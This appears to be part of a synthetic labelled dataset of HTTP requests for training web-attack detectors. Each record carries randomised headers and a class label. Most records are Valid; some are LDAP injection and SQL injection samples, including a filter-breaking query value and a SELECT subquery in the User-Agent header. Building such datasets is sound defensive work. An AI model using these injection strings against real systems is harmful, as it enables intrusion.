Cache-Control: dUeojp=ernoE2nh
Client-ip: 185.134.129.220
Cookie: u9niieSytit=@;fxj=4056;2TCm487o=lhoh6oydnWrmrs7;ktNtA=46054;nVse=awbodyn8
Cookie2: $Version="4"
Date: Sat, 18 Oct 08 01:44:06 CET
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: ilaa5ueb
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.6
Pragma: isndc3Nm='DovAsi'
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Basic dGVsYTpxdGNy
Range: -6168,6-
Referer: http://alntit8.uk/2aekmu4e/oRlbFaat/o80tsc/rBeOnliy.avi
TE: trailers,chunked,chunked;q=0.0
Trailer: Date
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 2.7; vn-no; rv:8.8.2) Gecko/82965928
UA-CPU: Sparc
UA-Disp: 1190,0442,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: 3.8 www.radF02E.jpeg, 6.5 www.PfasqUst.gif, FTP/3.6 37.55.126.58
Transfer-Encoding: notx
Upgrade: yppEuf/2.4
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38757
Start - Id: 37833
class: LdapInjection
GET /gnmdin1t/agsIdaeaosACwHwInest/smALNrGfuj1OF./MpFAK8uwand/axq@nhaN6oz-9gapLqit/uuhTiekbceem.mspx?ewfEwh=2TlRv&han=69&ehEinrb5ssta=Tcsce%29%28+%7C%28Ei%3D*%29&34QThttpBsSLD-id=26750&mccuE=dettewxp&i2NsshW=hEnhwherece4uhe&dhwhrUio=zSCjmQb4b&K.Po=32818&E0=9270&ryio=UttapmoiileeU&shtohzF=iprtEceDtesBl3xLnl&dEtiws=aJoMJ HTTP/1.1
Host: 198.211.60.78
Connection: 5utF0od
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 64.240.110.73
Cookie: rs=830630;Sintm7ureatte8u=oaa3XE42s;codrhlanoTo=ni1TbjWrnte
Cookie2: $Version="4"
Date: Mon, 11 Dec 06 07:34:54 CET
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: tlocso@Staohr.gov
If-Modified-Since: Sun, 29 Apr 07 18:35:43 UTC
If-Unmodified-Since: Wed, 21 Jan 09 14:18:12 CET
If-Match: "6LDVJKbY8NZaxk.pXUk"
If-None-Match: *
If-Range: Sat, 08 May 04 24:07:43 CET
Max-Forwards: 5611
MIME-Version: 1.8
Pragma: igernt='u'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: Basic YVJ1ZWM2Om9ybzQ=
Range: 853418-,-430
Referer: http://3z6yig6a.com/ltmmor/eYSniH.pdf
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/8.2 (compatible; ideil; Solaris; esaiosnu)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 8.5 219.117.54.210, 4.0 214.42.120.171
Transfer-Encoding: compress
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37833
Start - Id: 33548
class: Valid
POST /mS/aVbv7PMi7XJ4pkOpcC/Woq4K/tGtzbX@FwrHwhH9Qv8/VPWperlK1Jboot.inismetasa/det/rqft-g1Nri6Rn/tC_2SUMLhnnFOKJDm/Hpseohrrh/eUgmp1MlwrRxSuIWI/ysFMT/3xtiymyhn8o.jpeg? HTTP/1.1
Content-Length: 153
Content-Language: rtrl,e1twle,4ssHo
Content-Encoding: deflate
Content-Location: /toiwa.tar.gz
Content-MD5: dGRyYU5sNmFsaWk5bmloaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Nov 04 14:05:49 CET
Last-Modified: Mon, 07 Feb 05 21:10:24 UTC
Host: 5.73.3.188
Connection: keep-alive
Accept: text/*, text/xml;q=0.5
Accept-Charset: windows-1252;q=0.2, euc-jp;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: ywiTd-3l6y9mhx;q=0.8, arfacqkt-a6yui, a-gs1sae;q=0.5
Cache-Control: tsgr1zl=stT
Client-ip: 0.41.137.37
Cookie: dqsD7P=016439313;uZmlsx8=LaemyEm t4ouni
Cookie2: $Version="946"
Date: Wed, 07 Jan 09 10:21:58 UTC
ETag: "aRDa-YkpB0O_8r7e"
Expect: tk1od=qaaS7t;imlT2gn
From: nndz@n7ls.fr
If-Modified-Since: Thu, 28 Oct 04 16:14:36 GMT
If-Unmodified-Since: Sun, 28 Feb 10 18:51:19 CET
If-Match: *
If-None-Match: "R_n5UKWb6y.CHaujnaV_"
If-Range: "...uF7cyy8.OlU8bjM7"
Max-Forwards: 7
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: iegu ssseMwrr=mwsot
Authorization: Basic bTRnYWFlZTp1dzRzeGt3NQ==
Range: -842
Referer: /ri4v.sh
TE: trailers
Trailer: TE
User-Agent: 86tdunoe1sSmnv0t
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 417x756
Via: HTTP/8.4 www.IipiPwdd.jpeg:7749, qirh/6.4 www.5da2sTa.htm, 8.7 167.45.24.80
Transfer-Encoding: compress
Upgrade: ISrcs/4.9, Gqo/4.9, rzorSu/0.2, remnis/8.6, ulste1/0.7
Warning: 643 www.ra6U.htm:54672 "saen" 
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 4054384
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gnrue=82&aor0ktdml=oJ@ey8i9O9M&9edia=77741&Erh4n7ssr=eos18wAsorm&ei=4tscsEaestrr&ghmrhengenR=Piadmino&laxdakdt=4933079&ssrfceekti5m=mnsnlpHile8b&db=ndv

End - Id: 33548
Start - Id: 3539
class: Valid
GET /ilyir41jtrot4/lR2/znilnr/stgi1nnOds/lIN1cVV9pZmRmWEz/nK-XmqzxDA.pl?tofHw83usyeI=78010&DuN8telnetr=mesamrr+hp&sidnnratsrp=window.openkl5o3lkr&yEbmr=imOxp_thtbwgetadJ+&enleOetr=21077062&pavtu5ereruet=008400&ns8eAtdwcwhdoul=veBRBtR_o5Y&n8=z8%3Fe7&nsqc=engewEeeeetjnbl&V.1xzoT=iossphr&lwmaci=104570420&8swlerlbE70ewrN=8182091288&axBtoy6=aD%26systemsu&hkdi=98 HTTP/1.1
Host: www.e6barc.uk:95241
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic;q=0.2, windows-1258, x-mac-chinesetrad;q=0.5, iso-8859-2;q=0.2, ks_c_5601-1987;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 222.249.123.200
Cookie: a1dt5koorrtleiS=m=ro;hDyc6brrAZtnnn=auD-u@Tkd8;anno9ptsz=s s;3mochar@poxexec=og<H[eacceptiH+h2th;eenAttc4tnnuDmt=9361214
Cookie2: $Version="844"
Date: Thu, 04 Dec 08 10:36:19 UTC
ETag: W/"GzK3OIJX9n_w7S0ueg"
Expect: 100-continue
From: en6o@GjeessSofa.org
If-Modified-Since: Sun, 17 Oct 04 19:07:22 UTC
If-Unmodified-Since: Fri, 26 Sep 08 01:06:53 UTC
If-Match: "3qzzx_P5rbYzfflVQId"
If-None-Match: *
If-Range: Sat, 10 Jun 06 16:57:16 GMT
Max-Forwards: 495
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM MG1leGhuZW45OHRjOHlyT250ZXVHbGRtdGlpb2VjOWFzZGF0Y28=
Authorization: Basic dWlUZDpvUlVnZWE=
Range: 0-91,8335-51366
Referer: http://teeA.de/tduom/eumhess/zrs3li.tiff
TE: deflate;q=0.1,trailers
Trailer: Date
User-Agent: LoEio/0.7.0.1.0
UA-CPU: MIPS
UA-Disp: 782,802,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5560x152
Via: FTP/4.3 217.45.8.110, FTP/5.3 www.aNlStnDN.css
Transfer-Encoding: identity
Upgrade: tdodl/5.1, fhs/3.2, 04esnH/5.0
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 08087704716417
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3539
Start - Id: 41231
class: SqlInjection
GET /hiesb3otBoenfsntar8/t6VGOQ8_nXh.CcgMgml/ns/EnegAOi/sNOK15k/p9o11jlYIC8ha1zP/eifj5cc_j03D@YWY.asmx?tn8mWrb=386916&Gztdot=439967&f.yQocAZ=10200058 HTTP/1.0
Host: 26.210.253.108
Connection: keep-alive
Accept: text/plain;q=0.9
Accept-Charset: gb2312;q=0.3
Accept-Encoding: identity;q=0.1, compress;q=0.8, deflate;q=0.2, deflate;q=0.6
Accept-Language: *
Cache-Control: max-age=3499
Client-ip: 206.238.177.255
Cookie: 1Dcngmtni0p=hOlneckstueb;tnacale=ewscriptetT%s;@body0X=33106939;tnaorrir2h=13217
Cookie2: $Version="15"
Date: Sat, 23 Dec 06 19:29:35 UTC
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 85nrsds=oapP
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Tue, 20 Jul 04 08:06:27 GMT
If-Match: *
If-None-Match: "gRU4G2ecRbQSe5C7E"
If-Range: Fri, 02 Jan 09 17:09:45 CET
Max-Forwards: 042
MIME-Version: 2.3
Pragma: smth='sejag'
Proxy-Authorization: Basic aGEwa2hyNDpvZWN0
Authorization: Basic dEF3b2VidDpQeVR1
Referer: /uMbdeN/e7rennra/ssVeern/rzowWRe.bin
TE: trailers,chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: '   +  (   SELECT     TOP  1  wu2lndnq   FROM     Ei)    +    '
UA-CPU: MIPS
UA-Disp: 940,2353,32
UA-Color: color32
UA-Pixels: 598x7537
Via: 0.8 102.77.184.105, 8htsi/5.2 www.ohvlt.css:2976, FTP/6.9 171.67.230.48
Transfer-Encoding: feaa
Upgrade: WmdnaR/6.5, nsor/8.1, 4151p/2.5, 0uhl6/4.4, 2wnsz/5.7
X-Forwarded-For: 56.225.5.220
X-Serial-Number: 028293
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41231
Start - Id: 16773
class: Valid
GET /eagehlfdd1ta1at/reslherteAfnjEfes4i/gpV5ji3Oz_613Bt/aiOLy_K/akztTqXm_BLO7/i2tasaqs.jsp?mrt=H++&a8FO=e9vJZd7&reh=08488&8iih=o%29xterme&efmseU8hv=ew&at7dm=d%40Ui2Ol3Yoa&liHmE-8UYYinputQ=t8Y&1nke0bclrhEo=851976&NPfH35=eioi&s0Rx2MXfQLW=access_logi%26se8%28t-365y&bdtvOroNiiesa=2&wtzcjT=c%26a%40l HTTP/1.0
Host: 47.180.199.109
Connection: 0e0nhse
Accept: image/gif;q=0.4, application/*;q=0.2, text/*;q=0.5
Accept-Charset: x-mac-icelandic;q=0.2, iso-8859-8-i;q=0.9, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 228.43.150.132
Cookie: yoex=I';Dt6n=e;scsieiAtisoq=597;59n5oatf=rIIe s
Cookie2: $Version="238"
Date: Mon, 16 Apr 07 15:58:45 GMT
ETag: "J-jyQUJFX5X5GVI"
Expect: ae47Res
From: tAgim@uoet.gov
If-Modified-Since: Fri, 26 Mar 10 09:38:43 GMT
If-Unmodified-Since: Tue, 01 Aug 06 09:14:29 UTC
If-Match: *
If-None-Match: *
If-Range: "8KyAV6dVGetY8pC7-"
Max-Forwards: 43
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: hoxO 7t7eeo=uQ0rTcli
Range: 73855-,-7357
Referer: /foeeto/aaepeem/izn0.avi
TE: gzip;q=0.9,trailers,gzip;q=0.1
Trailer: Range
User-Agent: tcd7Fbat/6.6.4.6.2
UA-CPU: PowerPC
UA-Disp: 9450,977,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8734x738
Via: 0.2 www.brsi.png, FTP/3.3 150.149.82.74, 8.2 www.nnwz1.js
Transfer-Encoding: deflate
Upgrade: ret/6.5, tph/9.9, eiMan/0.4, qEir/6.9, 0be/8.7
Warning: 570 www.aeie.jpeg "o8tLYeamua7c0s" 
X-Forwarded-For: 38.253.106.148
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16773
Start - Id: 24335
class: Valid
GET /mSY5smatRLH/liaann/riiesCr6d/l4fecigHrnaixunIewvs/NR/moZJpULm/yretblnd/itisea/tIeh9uFp.htm?a0tncm=o&pde2iiLe=lO%2F+M&hdnnhn40tmnhaha=mRzrA&itlh=%7E%3Fad9cgzvtese6axul&eMrehiQ=laoNP8nty3tmicmr HTTP/1.0
Host: www.wEuiDen1sj.org
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: iso-8859-3;q=0.5, windows-1253, euc-jp, iso-8859-3
Accept-Encoding: *
Accept-Language: tOrMrsN-j8ryoe, o-c, EhfI-nsot;q=0.8, qui-oDe;q=0.8
Cache-Control: max-stale
Client-ip: 84.215.140.201
Cookie: vz=khNnireyaon;47sios=03718067
Cookie2: $Version="7"
Date: Sun, 01 May 05 08:03:04 GMT
ETag: "WG4ET8aLtnpGZfQSjuAb"
Expect: cefsv=ghaeeUc;vsoa4eh=lhIdpaie
From: R7wybte@tabs5a.fr
If-Modified-Since: Mon, 06 Feb 06 10:18:48 UTC
If-Unmodified-Since: Sat, 06 Sep 08 23:10:56 CET
If-Match: "c2Tyv3dN5TA2zQ63h2Tk"
If-None-Match: *
If-Range: "kJuYqzpit3vWV71o"
Max-Forwards: 8410
MIME-Version: 9.0
Pragma: a8g=fsm
Proxy-Authorization: sdipe ouneodh=Rermt
Authorization: Digest opaque="cdXneh"
Range: 3174-4551,6064-
Referer: /rtaa/oerho3/3Phhh8/rnrh/stcd.php3
TE: gzip
Trailer: Referer
User-Agent: estd8athein
UA-CPU: StrongARM
UA-Disp: 515,9191,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 352x5203
Via: 9.5 145.154.134.153:51883, trth/4.0 www.at3sucrh.html, FTP/3.7 27.25.48.247
Transfer-Encoding: deflate
Upgrade: otnks/1.0, smdrt/6.1
Warning: 189 www.Wti6r.tiff "Tpeaaepto6Oncyta" "Mon, 01 Jun 09 20:09:31 CET"
X-Forwarded-For: 153.46.193.204
X-Serial-Number: 6737813475044771
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24335
Start - Id: 13933
class: Valid
GET /lsuudoiaoCn9nveNa/ltebedmaaEeam/uAQyZdTuOlz_.php? HTTP/1.0
Host: 100.149.191.112:23
Connection: close
Accept: video/quicktime, video/quicktime;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 107.19.75.92
Cookie: eees6dashrtu0yt=530774;jd077grsdw=systems;eikehazwzhdoBi=g1sndtrUtnepm;3idte=prze;j796iPE=taatgbe3teA
Cookie2: $Version="1"
Date: Fri, 29 Feb 08 17:48:34 UTC
ETag: "bJbD_A9@czsMuEwnSn"
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Wed, 03 Sep 08 23:17:19 CET
If-Unmodified-Since: Thu, 23 Aug 07 13:13:17 GMT
If-Match: "2_JfJ6D-ML8FcVNac0"
If-None-Match: *
If-Range: "ky2JTQaF6zsEAjLcmxJ5"
Max-Forwards: 9
MIME-Version: 0.9
Pragma: a=ainZSst
Proxy-Authorization: Basic ZTZzcmVzUm86aGFld2VJbWw=
Authorization: Basic ZXRwZjpkdGtvc2lv
Range: 0-
Referer: http://www.lstIukR.com/riRA/We8s4r/sTteraho/lOnyinc0.swf
TE: chunked;q=0.9,chunked,deflate
Trailer: User-Agent
User-Agent: Mozilla/5.3 (X11; U; Open BSD i386 9.9; oe-hf; rv:6.9.0) Gecko/44441905
UA-CPU: PowerPC
UA-Disp: 2389,080,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5851x4169
Via: HTTP/9.1 65.103.77.134:5
Transfer-Encoding: compress
Upgrade: lpeSTs/3.3, o5tAe/3.7
Warning: 669 www.eavortz.js "DSa8rfspiemkwse7" "Sun, 22 Feb 09 17:32:26 UTC"
X-Forwarded-For: 144.135.40.157
X-Serial-Number: 023229886351818841
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13933
Start - Id: 10367
class: Valid
GET /eeotsdenpr/pyein5d8/Y.Nc%uLTxp_3y/otABg/jQ/SzWI3rm-yav/Hof/nandOv/H3i@2bNQezBNG-.asmx?eoer=773&tndazOe=positionita%2Bsnndajhomens&eetN5iT4ht=%24gL0hjso4acceptdr&e4aieusa=rp6xGALc&qauilNijmer=629&englrouwtbul=ttslnphDwwj4&sipjvgctrs=openeui%2FumochaoeleA&terxdooltr=ay+snetcat&nGgNM@FY=5i00ano820wi8ne7&erAadih=49596&ntl=%40netcat%3D3&mnorb2Ecjarni0=no6+u-1&w8No=ncb6mwahE1&nhnae=865537&idGWr@TFwF5.=stc HTTP/1.0
Host: www.ohunRwsnp.de
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress, gzip
Accept-Language: TC-9, Wiohgiz-vu
Cache-Control: min-fresh=642
Client-ip: 152.176.220.96
Cookie: sb0ss5ietdomv=575523
Cookie2: $Version="123"
Date: Thu, 17 Mar 05 13:25:18 GMT
ETag: "sByQXNmRkfJlEGc"
Expect: 100-continue
From: 5rOh@ndsafsvOY.ch
If-Modified-Since: Sun, 11 Dec 05 16:43:23 CET
If-Unmodified-Since: Tue, 23 Jan 07 21:36:48 GMT
If-Match: *
If-None-Match: "_k_yZFEnp0@15rzBc"
If-Range: Tue, 16 Mar 10 13:35:05 UTC
Max-Forwards: 6
MIME-Version: 3.9
Pragma: eiares=o0xter
Proxy-Authorization: Basic M2dkdDpyaWF0dGly
Authorization: tfuN4 sygnna=e8Gwlv
Range: 3188-815,-07
Referer: http://www.n7lzplh.org/t7ri/ob7e/tosih.pl
TE: deflate,trailers
Trailer: If-Match
User-Agent: Mozilla/0.8 (X11; U; Solaris 4.0; sx-TD; rv:9.7.1) Gecko/33670184
UA-CPU: 68000
UA-Disp: 329,0706,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 072x738
Via: HTTP/6.4 www.s5kahdH.tiff, HTTP/7.2 253.83.23.6
Transfer-Encoding: identity
Upgrade: 7heR/5.0
Warning: 627 www.brdRijj.html:96201 "nn2tlyihepU" "Mon, 21 Feb 05 15:12:00 GMT"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10367
Start - Id: 21239
class: Valid
GET /vqo8oeNade/eGl@BPVg/otr/dqsMs/eqaZmoafstucEo/TbbJ93.aspx?Rtice=Ala&twhc0Noo=97834&Y1MEue6A=lr.qkVQdeZ1&dAa3=+%29nsre%26perlqeTooNr&ttS5nc7s6q0S6=%2Foirueoiwa1iSsheteecho&eevnouwlh1s1de=evU&stgpiis=2884736&Auoxosr1hdSo2Qo=ht4s&iq=ooP%5Corl%28lo6&ylN=07315793 HTTP/1.1
Host: www.lf7Eebs.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.1
Accept-Language: mgih-t;q=0.5, EanN-fa;q=0.7, RSes-u;q=0.5, eif-r;q=0.2
Cache-Control: min-fresh=90581
Client-ip: 170.94.225.207
Cookie: CAbe=4T5nleensggz
Cookie2: $Version="6"
Date: Sat, 26 Mar 05 16:59:58 CET
ETag: "Pn7wpUNRDgZuyN1"
Expect: 100-continue
From: xlttati@m2ttsnraoo.uk
If-Modified-Since: Thu, 11 Oct 07 10:10:38 GMT
If-Unmodified-Since: Wed, 09 Feb 05 17:38:40 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Jun 05 15:43:10 CET
Max-Forwards: 4
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 514-56,34-,2775-22974
Referer: http://aohe.st/l8f2dN2/ld4y1vs.wmn
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: N7apo5 (sFOkbg; ikNBL-ObG_; 7NdS36k; hO0riQ0FO)
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x6900
Via: 3.4 www.2bopfX.gif, FTP/4.1 126.109.3.106
Transfer-Encoding: gzip
Upgrade: vlnrne/8.6, lQaa/8.0, ystnvI/3.6
Warning: 105 220.45.75.184:10 "ytobtcpe0cmlaiagf7in" "Sun, 01 Jan 06 03:01:20 CET"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 323295
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21239
Start - Id: 12800
class: Valid
GET /cjhpr/qQipeVhy2/cJi.4WfOFH4_x3gUmHjk/ne/AecobaadnDdrznsHuup/iIKDtlZqkP/QF-4x2cz@ILd/y52lrperleQQ.css?tcii1Lzoneoaeb=690&Elxsr=1Oe+oAnnai&rh=tTItOkr4&2qeasedo0c5eali=skusdro5meoa&dOpik=231881&saOdrehhlbr=7126339396&in9u=ivaftiyts68i&alra9tss1Sew=qem6tH%7C5aoan&ELTX@mobjectM0ab=44&mcoaecak=12747&tn9N=uN&hp=5969572 HTTP/1.1
Host: 190.157.156.194:80
Connection: close
Accept: text/*, text/html;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity
Accept-Language: nHtt-etTcanr;q=0.9, o-t;q=0.1
Cache-Control: 9gi5=heit
Client-ip: 112.71.203.72
Cookie: ehdsn7ot4sap=o-Bll5JKoZ;reeApecta8ih=r7p2xP
Cookie2: $Version="0"
Date: Tue, 07 Apr 09 24:40:35 UTC
ETag: W/"0sEZE3CJRoHdv4JLiQj"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Thu, 18 Aug 05 24:24:56 GMT
If-Unmodified-Since: Sun, 22 Feb 04 10:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Feb 07 11:37:21 GMT
Max-Forwards: 736
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 498n hlmtmd=7eifG
Range: 880687-,10-
Referer: http://www.egEl.uk/eyxlhi0t/szttEad/otabbo.pdf
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 5.0; lo-wi; rv:2.2.1) Gecko/31175151
UA-CPU: Sparc
UA-Disp: 718,169,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0376x655
Via: 7.7 57.86.250.85:9697, 9.5 40.148.147.59:936, FTP/2.3 www.skksE.jpeg
Transfer-Encoding: identity
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 1697647823
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12800
Start - Id: 17271
class: Valid
GET /thaeufaTfriq2eree7/tsetran1Ynrga/wIIi5T/tdos/h7nXi2AyhfEPPj_rq/iyst7zaVcy/7-fVUV4.tiff? HTTP/1.1
Host: www.4dnluvera9.ch
Connection: igrwp
Accept: audio/basic
Accept-Charset: windows-1251, euc-kr, euc-kr, utf-8
Accept-Encoding: 
Accept-Language: 4cnig-teCt, uwq-imtua;q=0.6, tiTLue-fnrri1ps;q=0.0, i-goH
Cache-Control: no-store
Client-ip: 68.43.213.56
Cookie: ieoqcaeeyaie=eT.2BDgO;6cmdTlMDV3h2echo=z5ra;m1eles=eilwqc;nee=8tadeler5smtN3e7he;oa0=4530;znt=5190
Cookie2: $Version="15"
Date: Fri, 25 Jan 08 17:30:26 CET
ETag: "jeijM8izjBO1wza"
Expect: 8r0cEafD
From: esNfaioe@i4sr.fr
If-Modified-Since: Tue, 25 Sep 07 08:22:22 CET
If-Unmodified-Since: Tue, 07 Aug 07 05:00:09 GMT
If-Match: "o6ttPztJzmQ4VxU0Z"
If-None-Match: *
If-Range: "5JLKe@.pyA7jIgcpH1"
Max-Forwards: 28
MIME-Version: 3.8
Pragma: ejoaH='unriehuh'
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM ZTB1bDl0aURtbUxvNzZlbHI5ZXRvZThoc0dzZDV0cW5kNQ==
Range: 119-6,6867-,-859
Referer: /eenn8eom/ento6sS/dnesr2/retss.mdb
TE: trailers,gzip;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 9.4; Ft-fe; rv:3.8.7) Gecko/05056079
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: 6.8 www.grtd.gif, FTP/1.8 www.wnenCad.gif, FTP/7.2 www.1nnf3r.gif
Transfer-Encoding: deflate
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17271
Start - Id: 34473
class: Valid
PUT /4-4CDVBmc/BWabstyle7yCaeval/J8Bshutdownkr90/ldonhoekltylaANY/ldtsnotJ/eq.a0AX/rMUqcCqOMk7rqau0d7w/ll_u9nvan_/dIqCIA..tiff? HTTP/1.1
Content-Length: 228
Content-Language: tA,n
Content-Encoding: identity
Content-Location: /oetntO/Rseq2rm/Ceolwid/Eahwsn.txt
Content-MD5: b3R0b2Fzd1RlcnN0bmVFdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Oct 07 15:09:12 UTC
Last-Modified: Sat, 20 Mar 04 16:04:07 CET
Host: www.ime73.com:80
Connection: ajitw
Accept: text/*, text/plain, video/*;q=0.1
Accept-Charset: windows-1257;q=0.5, windows-874;q=0.8, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *
Cache-Control: it='tot'
Client-ip: 129.193.110.22
Cookie: e8otgoncs6=ttec6t6oe@%uryapses6;uTnst=eameyiEomrse4c;deh=nfGSznLu-7;hnvNcTea7=kzGYnkrhhLuP;tmpjatUAC=27461
Cookie2: $Version="55"
Date: Sat, 22 Aug 09 14:48:50 GMT
ETag: "zliJNmsgq8S2bYr0j@cv"
Expect: 4ret=wd1dh
From: nS63m@sntnm9.biz
If-Modified-Since: Thu, 19 May 05 11:09:08 GMT
If-Unmodified-Since: Tue, 13 May 08 15:41:13 CET
If-Match: "JyGDwodjEk6wdD9zgM"
If-None-Match: *
If-Range: Tue, 28 Apr 09 05:46:43 CET
Max-Forwards: 766
MIME-Version: 3.2
Pragma: sbsenxsp=irw
Proxy-Authorization: NTLM YUgxVGhpb1JibmtDdW5lUHJ6d293aWVhaWVlb2VpdWFycnllM1NodWl0ZG9t
Authorization: Digest algorithm=7sede
Range: 152369-
Referer: /ie9hhE/Sdhtx.js
TE: chunked
Trailer: Upgrade
User-Agent: Sqstmtla5 (ixJM-.; aU4ge@RVo; d8Ga4h3qHR; iok@R.)
UA-CPU: StrongARM
UA-Disp: 563,2938,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: 0.6 135.70.214.207, HTTP/5.9 6.209.216.222:90818
Transfer-Encoding: deflate
Upgrade: 2nude/6.2, sdqEi/0.7
Warning: 184 116.163.25.21 "wlye" 
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 274973050
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5window.openCBzWXEn=iawideshSEessd&Rene0eync7e=xdepietlihoiEir&tilegxe=hrdocumentsfi7etOn wdt&ftyghrze=ealga1&h1Lmeldew=789210937&NTTqlsinsertjD=junv&etieieiDt0seGA=030&irruj9zlenu=iaTa wgeR<Heei0&fia6strs=aX2nf3p&roa7t=427661

End - Id: 34473
Start - Id: 43536
class: OsCommanding
